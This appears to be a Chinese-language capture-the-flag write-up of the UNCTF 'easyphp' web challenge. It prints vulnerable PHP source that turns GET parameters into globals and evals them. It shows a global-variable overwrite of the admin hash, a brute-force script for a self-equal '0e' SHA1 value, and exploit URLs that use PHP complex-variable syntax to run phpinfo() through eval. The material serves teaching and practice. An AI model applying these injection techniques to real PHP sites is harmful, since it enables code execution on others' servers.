UNCTF-WEB:easyphp(sha1爆破|php复杂变量)

2022-01-13 20:29:15

题目给出hint,访问source得到源码:

<?php

$adminPassword = ‘d8b8caf4df69a81f2815pbcb74cd73ab‘;
if (!function_exists(‘fuxkSQL‘)) {
    function fuxkSQL($iText)
    {
        $oText = $iText;
        $oText = str_replace(‘\\\\‘, ‘\\‘, $oText);
        $oText = str_replace(‘\"‘, ‘"‘, $oText);
        $oText = str_replace("\‘", "‘", $oText);
        $oText = str_replace("‘", "‘‘", $oText);
        return $oText;
    }
}
if (!function_exists(‘getVars‘)) {
    function getVars()
    {
        $totals = array_merge($_GET, $_POST);
        if (count($_GET)) {
            foreach ($_GET as $key => $value) {
                global ${$key};
                if (is_array($value)) {
                    $temp_array = array();
                    foreach ($value as $key2 => $value2) {
                        if (function_exists(‘mysql_real_escape_string‘)) {
                            $temp_array[$key2] = fuxkSQL(trim($value2));
                        } else {
                            $temp_array[$key2] = str_replace(‘"‘, ‘\"‘, str_replace("‘", "\‘", (trim($value2))));
                        }
                    }
                    ${$key} = $_GET[$key] = $temp_array;
                } else {
                    if (function_exists(‘mysql_real_escape_string‘)) {
                        ${$key} = fuxkSQL(trim($value));
                    } else {
                        ${$key} = $_GET[$key] = str_replace(‘"‘, ‘\"‘, str_replace("‘", "\‘", (trim($value))));
                    }
                }
            }
        }
    }
}

getVars();
if (isset($source)) {
    highlight_file(__FILE__);
}

//只有admin才能设置环境变量
if (md5($password) === $adminPassword && sha1($verif) == $verif) {
    echo ‘you can set config variables!!‘ . ‘</br>‘;
    foreach (array_keys($GLOBALS) as $key) {
        if (preg_match(‘/var\d{1,2}/‘, $key) && strlen($GLOBALS[$key]) < 12) {
            @eval("\$$key" . ‘="‘ . $GLOBALS[$key] . ‘";‘);
        }
    }
} else {
    foreach (array_keys($GLOBALS) as $key) {
        if (preg_match(‘/var\d{1,2}/‘, $key)) {
            echo ($GLOBALS[$key]) . ‘</br>‘;
        }
    }
}

 

这里要进入eval要使以下语句成立

  • md5($password) === $adminPassword
  • sha1($verif) == $verif

 

审计代码得到GET传入的值都会添加到全局变量中

  • global ${$key};

 

因为 $adminPassword = ‘d8b8caf4df69a81f2815pbcb74cd73ab‘,这个值不符合md5得规范(md5没有“p”)

所以覆盖adminPassword 变量使md5比较成立

 

接着要使sha1(val)=val,那么我们编写脚本爆破找出任意0exxx的变量的sha1还是0exxx

<?php
for ($i = 0; $i <= 9999999999; $i++) {
    $res = ‘0e‘ . $i;
    //0e1290633704
    if ($res == hash(‘sha1‘, $res)) {
        print_r($res);
    }
}

 

最后使用eval函数进行语句执行,因为过滤了单引号和限时了字符长度,使用php复杂变量进行拼接语句

exp:

http://08b4d626-d3fd-4b9c-880e-e969ac3318dc.node1.hackingfor.fun/?source&password=1&adminPassword=c4ca4238a0b923820dcc509a6f75849b&verif=0e1290633704&var3=phpinfo&var1={$var3}&var2={$var1()}

 

官方的exp:

?source=1&adminPassword=c4ca4238a0b923820dcc509a6f75849b&password=1&verif=0e1290633704&var1={$_GET[1]}&var3=${$var1()}&1=phpinfo

 

UNCTF-WEB:easyphp(sha1爆破|php复杂变量)

 

UNCTF-WEB:easyphp(sha1爆破|php复杂变量)

上一篇:jquery.jCal.js显示日历插件


下一篇:POJ 3009 Curling 2.0